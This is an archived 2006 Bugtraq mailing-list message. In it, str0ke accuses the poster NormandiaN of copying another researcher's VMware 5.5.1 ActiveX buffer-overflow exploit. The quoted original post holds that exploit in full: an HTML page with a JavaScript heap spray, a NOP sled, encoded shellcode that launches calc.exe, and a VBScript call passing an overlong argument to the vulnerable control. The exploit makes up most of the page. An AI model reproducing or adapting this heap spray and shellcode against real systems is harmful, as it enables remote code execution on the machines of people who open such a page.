lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Mon, 27 Nov 2006 13:35:53 -0600
From: str0ke <str0ke@...w0rm.com>
To: "NormandiaN_MailID@...oo.com" <NormandiaN_MailID@...oo.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: VMware 5.5.1 Local Buffer Overflow (HTML Exploit)

NormandiaN the code theif,

c0ntex discovered this and released it August 18th 2006, which you
pretty much stole everything line for line.  Nice job.

http://www.milw0rm.com/exploits/2264

/str0ke

On 26 Nov 2006 06:05:34 -0000, NormandiaN_MailID@...oo.com
<NormandiaN_MailID@...oo.com> wrote:
> <html>
> <head>
> <title>WinXP Pro SP2 lame local VMWare Buffer Overflow</title>
> </head>
> <body>
> <center>
> <br>
> Discovered By NormandiaN<br>
> Visit my website at http://www.grisapka.org<br>
> <br>
> <h3>
> This will exploit overflow and execute calc.exe on WinXP Pro SP2<br>
> (fully patched) against VMWare 5.5.1 Initialize ActiveX member.<br>
> </h3>
> I have only found a bad solution to this bug. Due to the fact that<br>
> my controlling assembler is a call dword ptr[reg] I need to point<br>
> to a location I control, fine. However my payload is random pretty<br>
> much every run. Therefor I fill half a HUGE  buffer with the address<br>
> (pointer) to my evil buffer, which them trampolines me to shellcode<br>
> <br>
> call ptr [reg]<br>
> [reg] -> 0xtrampoline<br>
> 0xtrampoline -> shellcode<br>
> <br>
> </center>
> <script>
> var buffa1 = unescape("%uedb0%u0d91")
> do {
> buffa1 += buffa1;
> }
> while (buffa1.length < 0x500000);
> var buffa2 = unescape("%u9090%u9090")
> do {
> buffa2 += buffa2;
> }
> while (buffa2.length < 0x800000);
> buffa1 += buffa2;
> buffa1 += unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
> "%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
> "%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
> "%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
> "%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
> "%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
> "%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
> "%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
> "%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
> "%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
> "%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
> "%uCC4A%uD0FF");
> </script>
> <object id="target" classid="clsid:F76E4799-379B-4362-BCC4-68B753D10744">
> </object>
> <script language="vbscript">
> VmdbDb=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> VmdbPoll=200011744
> target.Initialize VmdbDb, VmdbPoll
> </script>
> </body>
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ